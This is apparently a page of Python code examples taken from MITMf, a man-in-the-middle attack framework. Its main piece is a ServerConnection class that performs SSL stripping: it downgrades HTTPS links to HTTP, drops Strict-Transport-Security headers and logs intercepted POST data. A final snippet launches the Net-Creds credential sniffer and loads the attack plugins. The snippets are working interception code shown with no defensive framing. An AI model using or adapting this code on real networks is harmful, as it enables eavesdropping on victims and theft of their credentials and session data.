Esempio n. 1
0
    def getPluginStatus(plugin):
        # example: http://127.0.0.1:9090/cachekill
        for p in ProxyPlugins().plugin_list:
            if plugin == p.name:
                return json.dumps("1")

        return json.dumps("0")
Esempio n. 2
0
    def getPlugins():
        # example: http://127.0.0.1:9999/
        pdict = {}

        #print ProxyPlugins().plugin_list
        for activated_plugin in ProxyPlugins().plugin_list:
            pdict[activated_plugin.name] = True

        #print ProxyPlugins().all_plugins
        for plugin in ProxyPlugins().all_plugins:
            if plugin.name not in pdict:
                pdict[plugin.name] = False

        #print ProxyPlugins().pmthds

        return json.dumps(pdict)
Esempio n. 3
0
    def __init__(self, command, uri, postData, headers, client):

        self.command          = command
        self.uri              = uri
        self.postData         = postData
        self.headers          = headers
        self.client           = client
        self.clientInfo       = {}
        self.plugins          = ProxyPlugins()
        self.urlMonitor       = URLMonitor.getInstance()
        self.hsts             = URLMonitor.getInstance().hsts
        self.app              = URLMonitor.getInstance().app
        self.isImageRequest   = False
        self.isCompressed     = False
        self.contentLength    = None
        self.shutdownComplete = False

        self.handle_post_output = False
Esempio n. 4
0
    def setPluginStatus(plugin, status):
        # example: http://127.0.0.1:9090/cachekill/1 # enabled
        # example: http://127.0.0.1:9090/cachekill/0 # disabled
        if status == "1":
            for p in ProxyPlugins().all_plugins:
                if (p.name == plugin) and (p
                                           not in ProxyPlugins().plugin_list):
                    ProxyPlugins().add_plugin(p)
                    return json.dumps({
                        "plugin": plugin,
                        "response": "success"
                    })

        elif status == "0":
            for p in ProxyPlugins().plugin_list:
                if p.name == plugin:
                    ProxyPlugins().remove_plugin(p)
                    return json.dumps({
                        "plugin": plugin,
                        "response": "success"
                    })

        return json.dumps({"plugin": plugin, "response": "failed"})
Esempio n. 5
0
def shutdown(message=None):
    for plugin in ProxyPlugins().plugin_list:
        plugin.on_shutdown()
    sys.exit(message)
Esempio n. 6
0
class ServerConnection(HTTPClient):

    ''' The server connection is where we do the bulk of the stripping.  Everything that
    comes back is examined.  The headers we dont like are removed, and the links are stripped
    from HTTPS to HTTP.
    '''

    urlExpression     = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType           = re.compile(r"https://", re.IGNORECASE)
    urlExplicitPort   = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/',  re.IGNORECASE)
    urlTypewww        = re.compile(r"https://www", re.IGNORECASE)
    urlwExplicitPort  = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/',  re.IGNORECASE)
    urlToken1         = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
    urlToken2         = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
    #urlToken2        = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):

        self.command          = command
        self.uri              = uri
        self.postData         = postData
        self.headers          = headers
        self.client           = client
        self.clientInfo       = {}
        self.plugins          = ProxyPlugins()
        self.urlMonitor       = URLMonitor.getInstance()
        self.hsts             = URLMonitor.getInstance().hsts
        self.app              = URLMonitor.getInstance().app
        self.isImageRequest   = False
        self.isCompressed     = False
        self.contentLength    = None
        self.shutdownComplete = False

        self.handle_post_output = False

    def sendRequest(self):
        if self.command == 'GET':

            clientlog.info(self.headers['host'], extra=self.clientInfo)

            log.debug("Full request: {}{}".format(self.headers['host'], self.uri))

        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        for header, value in self.headers.iteritems():
            log.debug("Sending header: ({}: {})".format(header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        if self.handle_post_output is False: #So we can disable printing POST data coming from plugins 
            try:
                postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
                if len(postdata) > 0:
                    clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
            except Exception as e:
                if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
                    log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))

        self.handle_post_output = False
        self.transport.write(self.postData)

    def connectionMade(self):
        log.debug("HTTP connection made.")

        try:
            user_agent = parse(self.headers['user-agent'])

            self.clientInfo["clientos"] = user_agent.os.family
            self.clientInfo["browser"]  = user_agent.browser.family
            try:
                self.clientInfo["browserv"] = user_agent.browser.version[0]
            except IndexError:
                self.clientInfo["browserv"] = "Other"
        except KeyError:
            self.clientInfo["clientos"] = "Other"
            self.clientInfo["browser"]  = "Other"
            self.clientInfo["browserv"] = "Other"

        self.clientInfo["clientip"] = self.client.getClientIP()

        self.plugins.hook()
        self.sendRequest()
        self.sendHeaders()
        
        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):

        values = self.plugins.hook()

        version = values['version']
        code    = values['code']
        message = values['message']

        log.debug("Server response: {} {} {}".format(version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)
            if self.app:
                self.urlMonitor.addRedirection(self.client.uri, value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                log.debug("Response is image content, not scanning")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                log.debug("Response is compressed")
                self.isCompressed = True

        elif (key.lower()== 'strict-transport-security'):
            clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo)

        elif (key.lower() == 'content-length'):
            self.contentLength = value

        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)

        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

        self.client.setHeader("Expires", "0")
        self.client.setHeader("Cache-Control", "No-Cache")

        if self.length == 0:
            self.shutdown()

        self.plugins.hook()

        if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
            for header, value in self.client.headers.iteritems():
                log.debug("Receiving header: ({}: {})".format(header, value)) 

    def handleResponsePart(self, data):
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        if (self.isImageRequest):
            self.shutdown()
        else:
            #Gets rid of some generic errors
            try:
                HTTPClient.handleResponseEnd(self) 
            except:
                pass

    def handleResponse(self, data):
        if (self.isCompressed):
            log.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        data = self.replaceSecureLinks(data)
        data = self.plugins.hook()['data']

        #log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
        log.debug("Read from server {} bytes of data".format(len(data)))

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))
        
        try:
            self.client.write(data)
        except:
            pass

        try:
            self.shutdown()
        except:
            log.info("Client connection dropped before request finished.")

    def replaceSecureLinks(self, data):
        if self.hsts:

            sustitucion = {}
            patchDict = self.urlMonitor.patchDict

            if patchDict:
                dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)

            iterator = re.finditer(ServerConnection.urlExpression, data)       
            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)
                nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
                log.debug("Replacing {} => {}".format(url,nuevaurl))
                sustitucion[url] = nuevaurl

            if sustitucion:
                dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)

            return data

        else:

            iterator = re.finditer(ServerConnection.urlExpression, data)

            for match in iterator:
                url = match.group()

                log.debug("Found secure reference: " + url)

                url = url.replace('https://', 'http://', 1)
                url = url.replace('&', '&')
                self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)

            data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
            return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        if not self.shutdownComplete:
            self.shutdownComplete = True
            try:
                self.client.finish()
                self.transport.loseConnection()
            except:
                pass
Esempio n. 7
0
options.mac = get_mac(options.interface)

settings.Config.populate(options)

log.debug("MITMf started: {}".format(sys.argv))

#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)

NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)

from core.proxyplugins import ProxyPlugins

ProxyPlugins().all_plugins = plugins
for plugin in plugins:

    #load only the plugins that have been called at the command line
    if vars(options)[plugin.optname] is True:

        ProxyPlugins().add_plugin(plugin)

        print "|_ {} v{}".format(plugin.name, plugin.version)
        if plugin.tree_info:
            for line in xrange(0, len(plugin.tree_info)):
                print "|  |_ {}".format(plugin.tree_info.pop())

        plugin.setup_logger()
        plugin.initialize(options)